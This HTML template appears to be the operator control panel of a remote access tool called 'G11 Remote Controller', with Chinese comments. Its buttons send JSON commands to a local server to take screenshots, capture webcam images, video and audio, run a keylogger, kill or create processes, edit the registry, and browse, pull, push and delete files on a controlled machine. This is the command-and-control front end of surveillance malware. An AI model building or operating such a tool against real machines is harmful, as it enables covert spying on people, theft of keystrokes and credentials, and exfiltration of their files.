<!DOCTYPE html>
<html lang="en">
<head>
    <title>This is a test</title>

</head>
<body>

    <div class="con_left">
        <h1 align="center" style="font-size:39px; margin:-5px;">G11 Remote Controller</h1>
        <div class="filemanager">
            <h4  style="margin:7px;">Devices Managerment Unit</h4>
            <button type="button" style="width:120px;height:40px;"  value="screenshot" onclick="myfunc(this)">Screenshot</button>
            <button type="button" style="width:120px;height:40px;" value="camshot" onclick="myfunc(this)">Camshot</button>
            <button type="button" style="width:120px;height:40px;" value="cam_video" onclick="myfunc(this)">Cam Video</button>
            <button type="button" style="width:120px;height:40px;" value="audio" onclick="myfunc(this)">Audio Capture</button>
            <button type="button"  style="width:150px;height:40px;" value="keyboard" onclick="myfunc(this)">Keyboard Monitor</button><br/>
             <h4 style="margin:7px;">Processes Managerment Unit</h4>
            <button type="button"  style="width:120px;height:40px;" value="show_proc" onclick="myfunc(this)">Show Process</button>
            <button type="button"  style="width:120px;height:40px;" value="create_proc" onclick="myfunc(this)">Create Process</button><br/><br/>
            <form action="/consturct" method="post">
                Pid<input type="text" value="Please input pid to kill", name="pid">
                <input type="submit" value="Kill Process" style="width:120px;height:40px;">
            </form>


            <h4 style="margin:7px;">Registry Managerment Unit</h4>
            <button type="button" style="width:120px;height:40px;" value="add_reg" onclick="myfunc(this)">Add Reg</button>
            <button type="button" style="width:120px;height:40px;" value="delete_reg" onclick="myfunc(this)">Delete Reg</button>
            <button type="button" style="width:120px;height:40px;" value="ie_reg_modify" onclick="myfunc(this)">IE Reg Modify</button>
            <button type="button" style="width:120px;height:40px;" value="disp_reg" onclick="myfunc(this)">Display Reg</button>
            <br/>

            <h4 style="margin:7px;">Files Managerment Unit</h4>
            <button type="button"  style="width:120px;height:40px;" value="filebrowser" onclick="myfunc(this)">Browser files</button>

           <form action = "/consturct" method="post" enctype="multipart/form-data" id="UpLoad">
                    <input type="file" id="upFile" name="upFile">
                    <input type="submit" value="提交" id="uplod">
            </form>

            <button type="button" style="width:120px;height:40px;" name={{filename}} value="download" onclick="myfunc(this)">Upload</button>
            <button type="button" style="width:120px;height:40px;" value="cd" onclick="myfunc(this)">返回上级目录</button><br/>

            <script type="text/javascript">

                function myfunc(cmd_type) {

                    var httpRequest = new XMLHttpRequest();
                    httpRequest.open('POST', 'http://localhost:5000/consturct', true);
                    httpRequest.setRequestHeader("Content-type","application/json");

                    if (cmd_type.value === "filebrowser") {
                        //alert("success");
                        httpRequest.send(JSON.stringify({"command": "dir"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "screenshot") {
                        httpRequest.send(JSON.stringify({"command": "screenshot"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "download") {
                        var tmp = cmd_type.name;
                        httpRequest.send(JSON.stringify({"command": "download " + tmp + " E:\\test"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "camshot") {
                        httpRequest.send(JSON.stringify({"command": "camshot"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "cam_video") {
                        httpRequest.send(JSON.stringify({"command": "cam_video"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "show_proc") {
                        httpRequest.send(JSON.stringify({"command": "tasklist"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "create_proc") {
                        httpRequest.send(JSON.stringify({"command": "create_proc"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "audio") {
                        httpRequest.send(JSON.stringify({"command": "audiocatch"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "keyboard") {
                        httpRequest.send(JSON.stringify({"command": "keylogger"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "add_reg") {
                        httpRequest.send(JSON.stringify({"command": "add_reg"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "ie_reg_modify") {
                        httpRequest.send(JSON.stringify({"command": "ie_reg_modify"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "disp_reg") {
                        httpRequest.send(JSON.stringify({"command": "disp_reg"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "delete_reg") {
                        httpRequest.send(JSON.stringify({"command": "delete_reg"}));//发送请求 将json写入send中
                    } else if(cmd_type.value === "cd") {
                        httpRequest.send(JSON.stringify({"command": "cd"}));//发送请
                    }
                    setTimeout(function () {
	                    window.location.reload();
                    }, 1000);
                }
             </script>

             <p>目录:{{ filepath }}</p>
                <table border="1">

                <tr>
                    <th>Type</th>
                    <th>LastWriteDate</th>
                    <th>LastWriteTime</th>
                    <th>Length(bytes)</th>
                    <th>Name</th>
                    <th>Function</th>
                </tr>
                {% for file_entry in file_entries %}
                <tr>
                    <td>{{file_entry['Type']}}</td>
                    <td>{{file_entry['LastWriteDate']}}</td>
                    <td>{{file_entry['LastWriteTime']}}</td>
                    <td>{{file_entry['Length']}}</td>
                    <td>{{file_entry['Name']}}</td>
                    <td><button type="button" value={{file_entry['Name']}} name={{filepath}} onclick="deletefile(this)">删除</button></td>
                     <script type="text/javascript">
                        function deletefile(file) {
                            filename = file.value
                            path = file.name + '\\'+filename
                            //alert(path)
                            var httpRequest = new XMLHttpRequest();
                            httpRequest.open('POST', 'http://localhost:5000/consturct', true);
                            httpRequest.setRequestHeader("Content-type","application/json");
                            httpRequest.send(JSON.stringify({"command": "del", "path": path}));
                            setTimeout(function () {
	                    window.location.reload();
                    }, 1000);
                        }
                     </script>
                     <td><button type="button" value={{file_entry['Name']}} name={{filepath}} onclick="download(this)">下载</button></td>
                     <script type="text/javascript">
                        function download(file) {
                            filename = file.value
                            path = file.name + '\\'+filename
                            //alert(path)
                            var httpRequest = new XMLHttpRequest();
                            httpRequest.open('POST', 'http://localhost:5000/consturct', true);
                            httpRequest.setRequestHeader("Content-type","application/json");
                            httpRequest.send(JSON.stringify({"command": "upload"+" "+path}));
                            setTimeout(function () {
	                    window.location.reload();
                    }, 1000);
                        }
                    </script>

                    <td><button type="button" value={{file_entry['Name']}} name={{file_entry['Type']}} onclick="opendir(this)">打开</button></td>
                     <script type="text/javascript">
                        function opendir(file) {
                            type = file.name
                            filename = file.value
                            //alert(path)
                            var httpRequest = new XMLHttpRequest();
                            httpRequest.open('POST', 'http://localhost:5000/consturct', true);
                            httpRequest.setRequestHeader("Content-type","application/json");
                            httpRequest.send(JSON.stringify({"command": "enter "+filename}));
                            setTimeout(function () {
	                    window.location.reload();
                    }, 1000);
                        }
                    </script>

                </tr>
                {% endfor %}
            </table>
        </div>
    </div>
    <div class="con_right">
         <textarea id="testScrollTextArea" rows="55" disabled>
             {{ command_output }}}
         </textarea>
        <script>
            window.onload = function init(params) {
                var textArea = document.getElementById("testScrollTextArea");
                textArea.scrollTo(0, textArea.scrollHeight)
            }
        </script>

        <style>
            #testScrollTextArea {
                resize: none;
                width: 100%;
                height: 100%;
                /*margin: 10% 30%;*/
                font-size: 15px;
                position: relative;
                top: 0%;
                left:0%;
                background-color: #000207;
                color: #10d910;

            }

            #testScrollTextArea::-webkit-scrollbar {
                width: 8px;
            }

            #testScrollTextArea::-webkit-scrollbar-track {
                background-color: #ffffff;
                -webkit-border-radius: 2em;
                -moz-border-radius: 2em;
                border-radius: 2em;
            }

            #testScrollTextArea::-webkit-scrollbar-thumb {
                background-color: #a9a9ab;
                -webkit-border-radius: 2em;
                -moz-border-radius: 2em;
                border-radius: 2em;
            }
        </style>
    </div>

</body>
<style>
    .con_left{
        float:left;
        width:50%;
        height:100%
        border:1px solid #060}
    .con_right{
        float:right;
        width:50%;
        height:100%
        border:1px solid #00F}
    .filemanager {
        height: 50%
        border: 1px solid #661800
        overflow:auto;
    }
    .procmanager {
        height: 50%
        border: 1px solid #000e66
        overflow:auto;
    }
</style>
</html>